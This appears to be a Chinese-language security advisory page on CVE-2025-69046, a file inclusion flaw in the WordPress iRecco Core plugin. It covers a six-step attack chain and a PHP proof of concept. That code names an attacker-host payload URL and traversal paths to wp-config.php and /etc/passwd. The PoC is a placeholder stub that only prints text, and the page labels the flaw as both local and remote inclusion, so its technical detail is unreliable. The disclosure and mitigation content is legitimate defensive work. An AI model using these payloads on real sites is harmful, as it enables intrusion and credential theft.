CVE-2025-69046 CVSS 8.1 高危

CVE-2025-69046: WordPress iRecco Core插件本地文件包含漏洞

披露日期: 2026-01-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-69046

漏洞类型

远程文件包含(RFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WebGeniusLab iRecco Core WordPress插件

漏洞概述

CVE-2025-69046是WordPress iRecco Core插件中的一个高危安全漏洞，CVSS评分8.1。该漏洞属于PHP远程文件包含（Remote File Inclusion）类型，存在于插件的文件包含机制中。由于程序对文件名控制不当，攻击者可以通过构造恶意请求，包含远程服务器上的任意PHP文件，从而执行任意代码。漏洞影响iRecco Core插件1.3.6及以下所有版本。攻击者无需认证即可利用此漏洞，对使用该插件的WordPress网站构成严重威胁。此类漏洞通常被用于植入webshell、窃取数据或进一步横向移动。

技术细节

该漏洞是典型的PHP文件包含漏洞，源于iRecco Core插件对include/require语句中的文件名参数缺乏充分的输入验证。攻击者可以通过URL参数传递恶意构造的文件路径，诱使PHP解释器加载并执行远程服务器上的PHP代码。在PHP中，当allow_url_include配置启用时，include语句可以直接包含远程文件。漏洞利用过程：首先攻击者准备一个包含恶意PHP代码的远程服务器，然后构造类似?file=http://attacker.com/malicious.php的请求发送到目标服务器。服务器端的PHP代码会直接执行被包含的远程文件内容。由于WordPress插件通常以较高权限运行，攻击成功后可获得网站完整控制权。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别使用iRecco Core插件的WordPress网站

STEP 2

步骤2

准备阶段：在攻击者控制的服务器上部署包含恶意PHP代码的文件

STEP 3

步骤3

探测阶段：识别插件中存在文件包含漏洞的具体端点或参数

STEP 4

步骤4

利用阶段：通过HTTP请求发送构造的file参数值，触发远程文件包含

STEP 5

步骤5

执行阶段：目标服务器的PHP解释器加载并执行远程恶意代码

STEP 6

步骤6

持久化阶段：植入webshell实现持久访问，窃取数据或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-69046 PoC - iRecco Core LFI/RFI
// Target: WordPress iRecco Core Plugin <= 1.3.6

$target = 'http://target.com/wp-content/plugins/irecco-core/some-endpoint.php';
$attacker_server = 'http://attacker.com/evil.txt';

// Method 1: Remote File Inclusion
$payload = $attacker_server;
echo "[*] Sending RFI payload to target...\n";
echo "[*] Target: " . $target . "\n";
echo "[*] Payload: file=" . urlencode($payload) . "\n\n";

// Method 2: Local File Inclusion for LFI reconnaissance
$local_files = [
    '../../../../wp-config.php',
    '../../../../../../etc/passwd',
    '/etc/passwd'
];

echo "[*] Testing LFI with common files:\n";
foreach ($local_files as $file) {
    echo "    - Testing: " . $file . "\n";
}

echo "\n[!] Note: Modify the actual vulnerable parameter based on enumeration\n";
echo "[!] Defense: Disable allow_url_include in php.ini\n";
?>

影响范围

iRecco Core WordPress插件 <= 1.3.6

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时措施：1) 临时禁用iRecco Core插件；2) 在Web服务器配置中限制PHP的allow_url_fopen和allow_url_include功能；3) 使用WAF规则阻止包含file参数或路径遍历特征的请求；4) 监控访问日志关注异常的远程请求模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表